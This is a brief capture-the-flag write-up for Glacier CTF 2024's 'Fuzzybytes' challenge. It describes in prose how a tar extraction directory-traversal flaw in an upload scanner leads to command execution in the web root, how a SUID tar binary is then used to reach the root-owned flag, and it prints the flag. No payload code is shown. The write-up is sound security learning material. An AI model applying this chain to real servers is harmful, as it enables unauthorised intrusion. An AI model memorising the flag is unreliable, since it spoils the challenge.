#
Glacier CTF-2024
Application is vulnerable to zipslip(tarslip) vulnerability to get the command injection and SUID privilege to get the flag.
#
Fuzzybytes:
#
Static analysys:
In Upload.php
executing the /check_for_malicious_code.py
file to check the uploaded file.
In check_for_malicious_code.py:
application extracts the files from the tar
and checking for any malicious content and after checking it will remove the file from the directory.
For Extracting the .tar application uses the tar.extractall
and for removing shutil.rmtree
once the file uploded and scanned it will deleted by the application.
tar.extractall
fuction is vulnerable to directory traversal attack
.
POC:
#
Dynamic analysys:
Create the tar file:
Try our payload in local environment:
We have uploaded the file:
We have successfully traverse and put it in /var/www/html
repository.
Successfully got a command execution:
But not able to read the flag.txt.
We don't have permission to read the /root/flag.txt
While checking for the SUID binaries we got tar .
So decided to zip the flag using the tar.
Uploaded the new payload and execute.
While checking the local directory we get the flag.tar
Got the flag in local.
and got the flag in the CTF
Flag: gctf{c0nGr4tZ_on_Z1p_sLiDinG_4nD_Tar_diving}